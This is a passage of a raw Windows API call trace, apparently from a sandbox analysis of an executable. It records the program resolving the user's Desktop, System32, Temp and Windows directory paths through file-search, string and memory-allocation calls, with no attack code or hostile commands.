pbstr=0x13ffa9c*="c:\\Users") returned 1 [0052.634] SysReAllocStringLen (in: pbstr=0x13ffe10*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x13ffe10*="c:\\Users\\") returned 1 [0052.634] SysReAllocStringLen (in: pbstr=0x13ffaa8*="users", psz="fd1hvy", len=0x6 | out: pbstr=0x13ffaa8*="fd1hvy") returned 1 [0052.634] FindFirstFileW (in: lpFileName="c:\\Users\\fd1hvy", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x69ff0 [0052.635] FindNextFileW (in: hFindFile=0x69ff0, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0 [0052.635] GetLastError () returned 0x12 [0052.635] FindClose (in: hFindFile=0x69ff0 | out: hFindFile=0x69ff0) returned 1 [0052.635] SysReAllocStringLen (in: pbstr=0x13ffa9c*="c:\\Users\\", psz="c:\\Users\\FD1HVy", len=0xf | out: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy") returned 1 [0052.635] SysReAllocStringLen (in: pbstr=0x13ffe10*="c:\\Users\\FD1HVy", psz="c:\\Users\\FD1HVy\\", len=0x10 | out: pbstr=0x13ffe10*="c:\\Users\\FD1HVy\\") returned 1 [0052.635] SysReAllocStringLen (in: pbstr=0x13ffaa8*="fd1hvy", psz="desktop", len=0x7 | out: pbstr=0x13ffaa8*="desktop") returned 1 [0052.635] FindFirstFileW (in: lpFileName="c:\\Users\\FD1HVy\\desktop", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x6d07dee7, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x6d07dee7, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x6a4f0 [0052.635] FindNextFileW (in: hFindFile=0x6a4f0, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x6d07dee7, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x6d07dee7, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0 [0052.635] GetLastError () returned 0x12 [0052.635] FindClose (in: hFindFile=0x6a4f0 | out: hFindFile=0x6a4f0) returned 1 [0052.636] SysReAllocStringLen (in: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy\\", psz="c:\\Users\\FD1HVy\\Desktop", len=0x17 | out: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy\\Desktop") returned 1 [0052.636] SysReAllocStringLen (in: pbstr=0x13ffe10*="c:\\Users\\FD1HVy\\Desktop", psz="c:\\Users\\FD1HVy\\Desktop\\", len=0x18 | out: pbstr=0x13ffe10*="c:\\Users\\FD1HVy\\Desktop\\") returned 1 [0052.636] SysReAllocStringLen (in: pbstr=0x13ffa98*=0x0, psz="c:\\Users\\FD1HVy\\Desktop\\", len=0x18 | out: pbstr=0x13ffa98*="c:\\Users\\FD1HVy\\Desktop\\") returned 1 [0052.636] SysReAllocStringLen (in: pbstr=0x13ffe10*="c:\\Users\\FD1HVy\\Desktop\\", psz="c:\\Users\\FD1HVy\\Desktop", len=0x17 | out: pbstr=0x13ffe10*="c:\\Users\\FD1HVy\\Desktop") returned 1 [0052.637] SysReAllocStringLen (in: pbstr=0x13ffe14*=0x0, psz="c:\\Users\\FD1HVy\\Desktop", len=0x17 | out: pbstr=0x13ffe14*="c:\\Users\\FD1HVy\\Desktop") returned 1 [0052.637] SysReAllocStringLen (in: pbstr=0xe6005c*="c:\\users\\fd1hvy\\desktop\\", psz="c:\\Users\\FD1HVy\\Desktop\\", len=0x18 | out: pbstr=0xe6005c*="c:\\Users\\FD1HVy\\Desktop\\") returned 1 [0052.637] VirtualAlloc (lpAddress=0xe64000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x40) returned 0xe64000 [0052.639] GetSystemDirectoryW (in: lpBuffer=0xe63ea8, uSize=0xfffe | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0052.639] CharLowerBuffW (in: lpsz="C:\\WINDOWS\\system32", cchLength=0x13 | out: lpsz="c:\\windows\\system32") returned 0x13 [0052.639] SysReAllocStringLen (in: pbstr=0xe73eb0*=0x0, psz="c:\\windows\\system32", len=0x13 | out: pbstr=0xe73eb0*="c:\\windows\\system32") returned 1 [0052.639] SysReAllocStringLen (in: pbstr=0xe73eb4*=0x0, psz="c:", len=0x2 | out: pbstr=0xe73eb4*="c:") returned 1 [0052.640] SysReAllocStringLen (in: pbstr=0xe20818*=0x0, psz="windows", len=0x7 | out: pbstr=0xe20818*="windows") returned 1 [0052.640] SysReAllocStringLen (in: pbstr=0xe20790*=0x0, psz="system32", len=0x8 | out: pbstr=0xe20790*="system32") returned 1 [0052.640] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="windows", cchWideChar=7, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows", lpUsedDefaultChar=0x0) returned 7 [0052.640] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="system32", cchWideChar=8, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="system32", lpUsedDefaultChar=0x0) returned 8 [0052.640] VirtualFree (lpAddress=0xe74000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0052.641] SysReAllocStringLen (in: pbstr=0x13ffab0*=0x0, psz="c:", len=0x2 | out: pbstr=0x13ffab0*="c:") returned 1 [0052.641] SysReAllocStringLen (in: pbstr=0x13ffe04*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x13ffe04*="c:\\") returned 1 [0052.641] SysReAllocStringLen (in: pbstr=0x13ffaa8*=0x0, psz="windows", len=0x7 | out: pbstr=0x13ffaa8*="windows") returned 1 [0052.641] FindFirstFileW (in: lpFileName="c:\\windows", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xc838b81d, ftLastAccessTime.dwHighDateTime=0x1d41dc3, ftLastWriteTime.dwLowDateTime=0xc838b81d, ftLastWriteTime.dwHighDateTime=0x1d41dc3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x69e70 [0052.641] FindNextFileW (in: hFindFile=0x69e70, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xc838b81d, ftLastAccessTime.dwHighDateTime=0x1d41dc3, ftLastWriteTime.dwLowDateTime=0xc838b81d, ftLastWriteTime.dwHighDateTime=0x1d41dc3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0052.641] GetLastError () returned 0x12 [0052.641] FindClose (in: hFindFile=0x69e70 | out: hFindFile=0x69e70) returned 1 [0052.641] SysReAllocStringLen (in: pbstr=0x13ffa9c*=0x0, psz="c:\\Windows", len=0xa | out: pbstr=0x13ffa9c*="c:\\Windows") returned 1 [0052.641] SysReAllocStringLen (in: pbstr=0x13ffe04*="c:\\Windows", psz="c:\\Windows\\", len=0xb | out: pbstr=0x13ffe04*="c:\\Windows\\") returned 1 [0052.642] SysReAllocStringLen (in: pbstr=0x13ffaa8*="windows", psz="system32", len=0x8 | out: pbstr=0x13ffaa8*="system32") returned 1 [0052.642] FindFirstFileW (in: lpFileName="c:\\Windows\\system32", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xc0b701ad, ftLastAccessTime.dwHighDateTime=0x1d5d815, ftLastWriteTime.dwLowDateTime=0xc0b701ad, ftLastWriteTime.dwHighDateTime=0x1d5d815, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 0x69e70 [0052.642] FindNextFileW (in: hFindFile=0x69e70, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xc0b701ad, ftLastAccessTime.dwHighDateTime=0x1d5d815, ftLastWriteTime.dwLowDateTime=0xc0b701ad, ftLastWriteTime.dwHighDateTime=0x1d5d815, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 0 [0052.642] GetLastError () returned 0x12 [0052.642] FindClose (in: hFindFile=0x69e70 | out: hFindFile=0x69e70) returned 1 [0052.642] SysReAllocStringLen (in: pbstr=0x13ffa9c*="c:\\Windows\\", psz="c:\\Windows\\System32", len=0x13 | out: pbstr=0x13ffa9c*="c:\\Windows\\System32") returned 1 [0052.642] SysReAllocStringLen (in: pbstr=0x13ffe04*="c:\\Windows\\System32", psz="c:\\Windows\\System32\\", len=0x14 | out: pbstr=0x13ffe04*="c:\\Windows\\System32\\") returned 1 [0052.643] SysReAllocStringLen (in: pbstr=0x13ffa98*=0x0, psz="c:\\Windows\\System32\\", len=0x14 | out: pbstr=0x13ffa98*="c:\\Windows\\System32\\") returned 1 [0052.643] SysReAllocStringLen (in: pbstr=0x13ffe04*="c:\\Windows\\System32\\", psz="c:\\Windows\\System32", len=0x13 | out: pbstr=0x13ffe04*="c:\\Windows\\System32") returned 1 [0052.643] SysReAllocStringLen (in: pbstr=0x13ffe08*=0x0, psz="c:\\Windows\\System32", len=0x13 | out: pbstr=0x13ffe08*="c:\\Windows\\System32") returned 1 [0052.643] SysReAllocStringLen (in: pbstr=0xe60058*=0x0, psz="c:\\Windows\\System32\\", len=0x14 | out: pbstr=0xe60058*="c:\\Windows\\System32\\") returned 1 [0052.643] GetTempPathW (in: nBufferLength=0xfffe, lpBuffer=0xe63ea8 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0052.643] CharLowerBuffW (in: lpsz="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", cchLength=0x23 | out: lpsz="c:\\users\\fd1hvy\\appdata\\local\\temp\\") returned 0x23 [0052.644] SysReAllocStringLen (in: pbstr=0xe60094*=0x0, psz="c:\\users\\fd1hvy\\appdata\\local\\temp\\", len=0x23 | out: pbstr=0xe60094*="c:\\users\\fd1hvy\\appdata\\local\\temp\\") returned 1 [0052.644] SysReAllocStringLen (in: pbstr=0xe60098*=0x0, psz="c:", len=0x2 | out: pbstr=0xe60098*="c:") returned 1 [0052.644] SysReAllocStringLen (in: pbstr=0xe2267c*=0x0, psz="users", len=0x5 | out: pbstr=0xe2267c*="users") returned 1 [0052.644] SysReAllocStringLen (in: pbstr=0xe20790*=0x0, psz="fd1hvy", len=0x6 | out: pbstr=0xe20790*="fd1hvy") returned 1 [0052.644] SysReAllocStringLen (in: pbstr=0xe20818*=0x0, psz="appdata", len=0x7 | out: pbstr=0xe20818*="appdata") returned 1 [0052.644] SysReAllocStringLen (in: pbstr=0xe600cc*=0x0, psz="local", len=0x5 | out: pbstr=0xe600cc*="local") returned 1 [0052.645] SysReAllocStringLen (in: pbstr=0xe600d8*=0x0, psz="temp", len=0x4 | out: pbstr=0xe600d8*="temp") returned 1 [0052.645] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="users", cchWideChar=5, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="usersm32", lpUsedDefaultChar=0x0) returned 5 [0052.645] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="fd1hvy", cchWideChar=6, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fd1hvy32", lpUsedDefaultChar=0x0) returned 6 [0052.645] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="appdata", cchWideChar=7, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appdata2", lpUsedDefaultChar=0x0) returned 7 [0052.645] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="local", cchWideChar=5, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="localta2", lpUsedDefaultChar=0x0) returned 5 [0052.645] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="temp", cchWideChar=4, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="templta2", lpUsedDefaultChar=0x0) returned 4 [0052.646] SysReAllocStringLen (in: pbstr=0x13ffab0*=0x0, psz="c:", len=0x2 | out: pbstr=0x13ffab0*="c:") returned 1 [0052.646] SysReAllocStringLen (in: pbstr=0x13ffdf8*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x13ffdf8*="c:\\") returned 1 [0052.646] SysReAllocStringLen (in: pbstr=0x13ffaa8*=0x0, psz="users", len=0x5 | out: pbstr=0x13ffaa8*="users") returned 1 [0052.646] FindFirstFileW (in: lpFileName="c:\\users", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x69e70 [0052.646] FindNextFileW (in: hFindFile=0x69e70, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0052.646] GetLastError () returned 0x12 [0052.646] FindClose (in: hFindFile=0x69e70 | out: hFindFile=0x69e70) returned 1 [0052.646] SysReAllocStringLen (in: pbstr=0x13ffa9c*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x13ffa9c*="c:\\Users") returned 1 [0052.646] SysReAllocStringLen (in: pbstr=0x13ffdf8*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x13ffdf8*="c:\\Users\\") returned 1 [0052.647] SysReAllocStringLen (in: pbstr=0x13ffaa8*="users", psz="fd1hvy", len=0x6 | out: pbstr=0x13ffaa8*="fd1hvy") returned 1 [0052.647] FindFirstFileW (in: lpFileName="c:\\Users\\fd1hvy", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x6a4f0 [0052.647] FindNextFileW (in: hFindFile=0x6a4f0, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0 [0052.647] GetLastError () returned 0x12 [0052.647] FindClose (in: hFindFile=0x6a4f0 | out: hFindFile=0x6a4f0) returned 1 [0052.647] SysReAllocStringLen (in: pbstr=0x13ffa9c*="c:\\Users\\", psz="c:\\Users\\FD1HVy", len=0xf | out: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy") returned 1 [0052.647] SysReAllocStringLen (in: pbstr=0x13ffdf8*="c:\\Users\\FD1HVy", psz="c:\\Users\\FD1HVy\\", len=0x10 | out: pbstr=0x13ffdf8*="c:\\Users\\FD1HVy\\") returned 1 [0052.647] SysReAllocStringLen (in: pbstr=0x13ffaa8*="fd1hvy", psz="appdata", len=0x7 | out: pbstr=0x13ffaa8*="appdata") returned 1 [0052.647] FindFirstFileW (in: lpFileName="c:\\Users\\FD1HVy\\appdata", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x3b5a0677, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3b5a0677, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0x6a4f0 [0052.647] FindNextFileW (in: hFindFile=0x6a4f0, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x3b5a0677, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3b5a0677, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0 [0052.648] GetLastError () returned 0x12 [0052.648] FindClose (in: hFindFile=0x6a4f0 | out: hFindFile=0x6a4f0) returned 1 [0052.648] SysReAllocStringLen (in: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy\\", psz="c:\\Users\\FD1HVy\\AppData", len=0x17 | out: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy\\AppData") returned 1 [0052.648] SysReAllocStringLen (in: pbstr=0x13ffdf8*="c:\\Users\\FD1HVy\\AppData", psz="c:\\Users\\FD1HVy\\AppData\\", len=0x18 | out: pbstr=0x13ffdf8*="c:\\Users\\FD1HVy\\AppData\\") returned 1 [0052.648] SysReAllocStringLen (in: pbstr=0x13ffaa8*="appdata", psz="local", len=0x5 | out: pbstr=0x13ffaa8*="local") returned 1 [0052.648] FindFirstFileW (in: lpFileName="c:\\Users\\FD1HVy\\AppData\\local", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xb6f6a4d1, ftLastAccessTime.dwHighDateTime=0x1d5d815, ftLastWriteTime.dwLowDateTime=0xb6f6a4d1, ftLastWriteTime.dwHighDateTime=0x1d5d815, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0x6a2b0 [0052.648] FindNextFileW (in: hFindFile=0x6a2b0, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xb6f6a4d1, ftLastAccessTime.dwHighDateTime=0x1d5d815, ftLastWriteTime.dwLowDateTime=0xb6f6a4d1, ftLastWriteTime.dwHighDateTime=0x1d5d815, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0 [0052.648] GetLastError () returned 0x12 [0052.648] FindClose (in: hFindFile=0x6a2b0 | out: hFindFile=0x6a2b0) returned 1 [0052.649] SysReAllocStringLen (in: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy\\AppData\\", psz="c:\\Users\\FD1HVy\\AppData\\Local", len=0x1d | out: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy\\AppData\\Local") returned 1 [0052.649] SysReAllocStringLen (in: pbstr=0x13ffdf8*="c:\\Users\\FD1HVy\\AppData\\Local", psz="c:\\Users\\FD1HVy\\AppData\\Local\\", len=0x1e | out: pbstr=0x13ffdf8*="c:\\Users\\FD1HVy\\AppData\\Local\\") returned 1 [0052.649] SysReAllocStringLen (in: pbstr=0x13ffaa8*="local", psz="temp", len=0x4 | out: pbstr=0x13ffaa8*="temp") returned 1 [0052.649] FindFirstFileW (in: lpFileName="c:\\Users\\FD1HVy\\AppData\\Local\\temp", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x744ebc9f, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x744ebc9f, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0x6a4f0 [0052.649] FindNextFileW (in: hFindFile=0x6a4f0, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x744ebc9f, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x744ebc9f, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0 [0052.649] GetLastError () returned 0x12 [0052.649] FindClose (in: hFindFile=0x6a4f0 | out: hFindFile=0x6a4f0) returned 1 [0052.649] SysReAllocStringLen (in: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy\\AppData\\Local\\", psz="c:\\Users\\FD1HVy\\AppData\\Local\\Temp", len=0x22 | out: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy\\AppData\\Local\\Temp") returned 1 [0052.649] SysReAllocStringLen (in: pbstr=0x13ffdf8*="c:\\Users\\FD1HVy\\AppData\\Local\\Temp", psz="c:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", len=0x23 | out: pbstr=0x13ffdf8*="c:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 1 [0052.650] SysReAllocStringLen (in: pbstr=0x13ffa98*=0x0, psz="c:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", len=0x23 | out: pbstr=0x13ffa98*="c:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 1 [0052.650] SysReAllocStringLen (in: pbstr=0x13ffdf8*="c:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", psz="c:\\Users\\FD1HVy\\AppData\\Local\\Temp", len=0x22 | out: pbstr=0x13ffdf8*="c:\\Users\\FD1HVy\\AppData\\Local\\Temp") returned 1 [0052.650] SysReAllocStringLen (in: pbstr=0x13ffdfc*=0x0, psz="c:\\Users\\FD1HVy\\AppData\\Local\\Temp", len=0x22 | out: pbstr=0x13ffdfc*="c:\\Users\\FD1HVy\\AppData\\Local\\Temp") returned 1 [0052.651] SysReAllocStringLen (in: pbstr=0xe60060*=0x0, psz="c:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", len=0x23 | out: pbstr=0xe60060*="c:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 1 [0052.651] GetWindowsDirectoryW (in: lpBuffer=0xe63ea8, uSize=0xfffe | out: lpBuffer="C:\\WINDOWS") returned 0xa [0052.651] CharLowerBuffW (in: lpsz="C:\\WINDOWS", cchLength=0xa | out: lpsz="c:\\windows") returned 0xa [0052.651] SysReAllocStringLen (in: pbstr=0xe60094*=0x0, psz="c:\\windows", len=0xa | out: pbstr=0xe60094*="c:\\windows") returned 1 [0052.651] SysReAllocStringLen (in: pbstr=0xe60098*=0x0, psz="c:", len=0x2 | out: pbstr=0xe60098*="c:") returned 1 [0052.651] SysReAllocStringLen (in: pbstr=0xe20818*=0x0, psz="windows", len=0x7 | out: pbstr=0xe20818*="windows") returned 1 [0052.651] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="windows", cchWideChar=7, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows2", lpUsedDefaultChar=0x0) returned 7 [0052.652] SysReAllocStringLen (in: pbstr=0x13ffab0*=0x0, psz="c:", len=0x2 | out: pbstr=0x13ffab0*="c:") returned 1 [0052.652] SysReAllocStringLen (in: pbstr=0x13ffdec*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x13ffdec*="c:\\") returned 1 [0052.652] SysReAllocStringLen (in: pbstr=0x13ffaa8*=0x0, psz="windows", len=0x7 | out: pbstr=0x13ffaa8*="windows") returned 1 [0052.652] FindFirstFileW (in: lpFileName="c:\\windows", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xc838b81d, ftLastAccessTime.dwHighDateTime=0x1d41dc3, ftLastWriteTime.dwLowDateTime=0xc838b81d, ftLastWriteTime.dwHighDateTime=0x1d41dc3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x69ff0 [0052.652] FindNextFileW (in: hFindFile=0x69ff0, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xc838b81d, ftLastAccessTime.dwHighDateTime=0x1d41dc3, ftLastWriteTime.dwLowDateTime=0xc838b81d, ftLastWriteTime.dwHighDateTime=0x1d41dc3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0052.652] GetLastError () returned 0x12 [0052.652] FindClose (in: hFindFile=0x69ff0 | out: hFindFile=0x69ff0) returned 1 [0052.652] SysReAllocStringLen (in: pbstr=0x13ffa9c*=0x0, psz="c:\\Windows", len=0xa | out: pbstr=0x13ffa9c*="c:\\Windows") returned 1 [0052.653] SysReAllocStringLen (in: pbstr=0x13ffdec*="c:\\Windows", psz="c:\\Windows\\", len=0xb | out: pbstr=0x13ffdec*="c:\\Windows\\") returned 1 [0052.653] 